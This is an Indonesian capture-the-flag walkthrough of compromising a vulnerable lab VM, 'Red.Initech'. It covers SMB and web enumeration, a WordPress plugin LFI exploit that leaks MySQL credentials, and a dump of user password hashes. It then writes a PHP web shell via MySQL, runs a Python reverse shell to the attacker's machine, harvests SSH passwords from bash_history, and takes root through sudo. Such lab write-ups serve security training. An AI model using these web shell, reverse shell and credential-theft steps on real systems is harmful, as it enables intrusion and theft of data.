smb: \> cd kathy_stuff\ smb: \kathy_stuff\> ls . D 0 Sun Jun 5 11:02:27 2016 .. D 0 Fri Jun 3 12:52:52 2016 todo-list.txt N 64 Sun Jun 5 11:02:27 2016 19478204 blocks of size 1024. 16397108 blocks available smb: \kathy_stuff\> get todo-list.txt getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec) smb: \kathy_stuff\> cd .. smb: \> cd backup\ smb: \backup\> ls . D 0 Sun Jun 5 11:04:14 2016 .. D 0 Fri Jun 3 12:52:52 2016 vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016 wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16397108 blocks available smb: \backup\> get vsftpd.conf getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec) smb: \backup\> quit
Setelah kita selesai dengan kathy share, kita bisa lakukan hal yang sama untuk tmp share,
smbclient //fred/tmp -I 192.168.0.61 -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Jun 7 04:08:39 2016 .. D 0 Mon Jun 6 17:39:56 2016 ls N 274 Sun Jun 5 11:32:58 2016 19478204 blocks of size 1024. 16397096 blocks available smb: \> quit
Tampaknya tidak ada yang menarik, paling tidak kita dapat file konfigurasi FTP, dan to-do-list.
Coba kita lihat,
cat todo-list.txt
isinya,
I'm making sure to backup anything important for Initech, Kathy
Coba kita lihat,
cat ls
isinya,
.: total 12.0K drwxrwxrwt 2 root root 4.0K Jun 5 16:32 . drwxr-xr-x 16 root root 4.0K Jun 3 22:06 .. -rw-r--r-- 1 root root 0 Jun 5 16:32 ls drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Nikto 12380
Cek web
nikto -h 192.168.0.61:12380
Hasilnya,
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.61 + Target Hostname: 192.168.0.61 + Target Port: 12380 --------------------------------------------------------------------------- + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost Ciphers: ECDHE-RSA-AES256-GCM-SHA384 Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost + Start Time: 2023-01-23 01:55:17 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. + The site uses SSL and Expect-CT header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Hostname '192.168.0.61' does not match certificate's names: Red.Initech + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + 8071 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2023-01-23 01:59:01 (GMT-5) (224 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt.
Akses Web
Coba akses,
https://192.168.0.61:12380/robots.txt
Tampak isinya,
User-agent: * Disallow: /admin112233/ Disallow: /blogblog/
Mari kita coba
https://192.168.0.61:12380/admin112233/
Akan mengeluarkan "humor"
This could of been a BeEF-XSS hook ;)
Mari kita coba
https://192.168.0.61:12380/blogblog/
Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page.
WPScan
Scan menggunakan,
wpscan --url https://192.168.0.61:12380/blogblog/ -e u --disable-tls-checks wpscan --url https://192.168.0.61:12380/blogblog/ -e ap --disable-tls-checks
Hasilnya,
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61] [+] Started: Mon Jan 23 03:19:59 2023 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.18 (Ubuntu) | - Dave: Soemthing doesn't look right here | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register | Found By: Di rect Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp- content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27). | Found By: Rss Generator (Passive Detection) | - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
[+] WordPress theme in use: bhost | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/ | Last Updated: 2022-10-30T00:00:00.000Z | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt | [!] The version is out of date, the latest version is 1.6 | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | Style Name: BHost | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | Author: Masum Billah | Author URI: http://getmasum.net/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2.9 (80% confidence) | Found By: Style (Passive Detection) | - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] John Smith | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: Rss Generator (Passive Detection) [+] john | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] garry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] barry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] elly | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] peter | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] heather | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] harry | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] scott | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] kathy | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] tim | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Jan 23 03:20:02 2023 [+] Requests Done: 23 [+] Cached Requests: 55 [+] Data Sent: 7.361 KB [+] Data Received: 49.097 KB [+] Memory used: 193.543 MB [+] Elapsed time: 00:00:03
Hasil -e ap
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61] [+] Started: Mon Jan 23 03:23:24 2023 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.18 (Ubuntu) | - Dave: Soemthing doesn't look right here | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27). | Found By: Rss Generator (Passive Detection) | - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator> | - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
[+] WordPress theme in use: bhost | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/ | Last Updated: 2022-10-30T00:00:00.000Z | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt | [!] The version is out of date, the latest version is 1.6 | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1 | Style Name: BHost | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ... | Author: Masum Billah | Author URI: http://getmasum.net/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2.9 (80% confidence) | Found By: Style (Passive Detection) | - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Jan 23 03:23:29 2023 [+] Requests Done: 2 [+] Cached Requests: 34 [+] Data Sent: 660 B [+] Data Received: 1.093 KB [+] Memory used: 239.617 MB [+] Elapsed time: 00:00:05
Keren!
- Kita dapat banyak user
- Tampaknya ada XSS Vulnerability, Path Traversal Vulnerability
- Cek LFI exploit https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion dibagian advanced-video-embed-embed-videos-or-playlists
- Contoh exploit ada di https://www.exploit-db.com/exploits/39646
LFI Exploit
Download Exploit dari https://www.exploit-db.com/exploits/39646 Edit file
vi /home/kali/Downloads/39646.py
Tambahkan,
import ssl ssl._create_default_https_context = ssl._create_unverified_context url = "https://192.168.0.61:12380/blogblog/"
Jalankan
cd /home/kali/Downloads/ python2 39646.py
Setelah berhasil jalan, coba masuk ke
https://192.168.0.61:12380/blogblog/wp-content/uploads/
Akan tampak,
Index of /blogblog/wp-content/uploads [ICO] Name Last modified Size Description [PARENTDIR] Parent Directory - [IMG] 1402053515.jpeg 2023-01-23 16:11 3.0K
terlihat ada file 1402053515.jpeg Klik kanan di file tersebut, simpan di komputer kita.
cd /home/kali/Downloads/ wget --no-check-certificate https://192.168.0.61:12380/blogblog/wp-content/uploads/1402053515.jpeg
Rename jpeg :) ...
mv 1402053515.jpeg 1402053515 more 1402053515
Hasilnya,
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'plbkac'); /** MySQL hostname */ define('DB_HOST', 'localhost');
Keren! kita dapat password MySQL ..
Akses MySQL
Akses MySQL menggunakan,
mysql -u root -p -h 192.168.0.61 -pplbkac
Hasilnya,
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 119 Server version: 5.7.12-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]>
Lihat database yang ada,
MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | loot | | mysql | | performance_schema | | phpmyadmin | | proof | | sys | | wordpress | +--------------------+ 8 rows in set (0.059 sec)
Pakai database wordpress,
MySQL [(none)]> use wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [wordpress]>
Cek tables,
MySQL [wordpress]> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 11 rows in set (0.001 sec)
Cek struktur data wp_users,
MySQL [wordpress]> describe wp_users; +---------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +---------------------+---------------------+------+-----+---------------------+----------------+ | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | user_login | varchar(60) | NO | MUL | | | | user_pass | varchar(64) | NO | | | | | user_nicename | varchar(50) | NO | MUL | | | | user_email | varchar(100) | NO | | | | | user_url | varchar(100) | NO | | | | | user_registered | datetime | NO | | 0000-00-00 00:00:00 | | | user_activation_key | varchar(60) | NO | | | | | user_status | int(11) | NO | | 0 | | | display_name | varchar(250) | NO | | | | +---------------------+---------------------+------+-----+---------------------+----------------+ 10 rows in set (0.002 sec)
Print username & password (di hash)
MySQL [wordpress]> SELECT user_login, user_pass FROM wp_users; +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | +------------+------------------------------------+ 16 rows in set (0.001 sec)
Keren! kita bisa meng-crack password dengan md5 menggunakan hashcat atau menggunakan crack md5 online lewat web.
MySQL generate shell.php
Dari shell MySQL ketik,
select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Akses
https://192.168.0.61:12380/blogblog/wp-content/uploads/
Akan tampak
Index of /blogblog/wp-content/uploads [ICO] Name Last modified Size Description [PARENTDIR] Parent Directory - [IMG] 1402053515.jpeg 2023-01-23 16:11 3.0K [ ] shell.php 2023-01-23 16:34 39 Apache/2.4.18 (Ubuntu) Server at 192.168.0.61 Port 12380
Terlihat ada shell.php. Sekarang akses URL berikut untuk mencek apakah shell.php bisa dipakai:) ..
https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig
Hasilnya kira-kira
enp0s3 Link encap:Ethernet HWaddr 08:00:27:8b:94:43 inet addr:192.168.0.61 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:299263 errors:91 dropped:0 overruns:0 frame:0 TX packets:97438 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:27580727 (27.5 MB) TX bytes:69269091 (69.2 MB) Interrupt:19 Base address:0xd000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:468 errors:0 dropped:0 overruns:0 frame:0 TX packets:468 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:50152 (50.1 KB) TX bytes:50152 (50.1 KB)
Inti-nya shell.php bisa di pakai :) ..
Akses Shell via Web
Cek IP address & catat kali linux
ifconfig
Misalnya IP address kali linux 192.168.0.62 Siapkan di kali linux,
nc -lvp 443
Lewat browser jalankan URL (asumsi IP address kali linux
https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.62",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Jika berjalan dengan baik akan tampak
192.168.0.61: inverse host lookup failed: Unknown host connect to [192.168.0.62] from (UNKNOWN) [192.168.0.61] 50340 /bin/sh: 0: can't access tty; job control turned off $
Gunakan python untuk mengaktifkan bash
$ python -c 'import pty;pty.spawn("/bin/bash")' www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd / cd / www-data@red:/$ ls ls bin etc lib mnt root snap tmp vmlinuz.old boot home lost+found opt run srv usr dev initrd.img.old media proc sbin sys var www-data@red:/$ cd home cd home www-data@red:/home$
Lihat bash_history menggunakan
www-data@red:/home$ find -name ".bash_history" -exec cat {} \; find -name ".bash_history" -exec cat {} \; exit exit free exit exit exit exit exit exit exit exit exit exit exit top ps aux exit exit id cat: ./peter/.bash_history: Permission denied find: './peter/.cache': Permission denied exit id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit exit exit exit exit exit exit exit exit whoami exit exit exit top exit
Terlihat ada dua (2) username & password
JKanode thisismypassword peter JZQuyIN5
SSH ke Server
ssh ke server
ssh peter@192.168.0.61
----------------------------------------------------------------- ~ Barry, don't forget to put a message here ~ ----------------------------------------------------------------- red%
Menjadi su
red% sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for peter: Matching Defaults entries for peter on red: lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User peter may run the following commands on red: (ALL : ALL) ALL red%
Capture the Flag
red% sudo usermod -s /bin/bash peter red% sudo -i ➜ ~ cd /root ➜ ~ ls fix-wordpress.sh flag.txt issue python.sh wordpress.sql ➜ ~ cat flag.txt 16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)<(Congratulations)>16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB) .--. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------` b6b545dc11b7a270f4bad23432190c75162c4a2b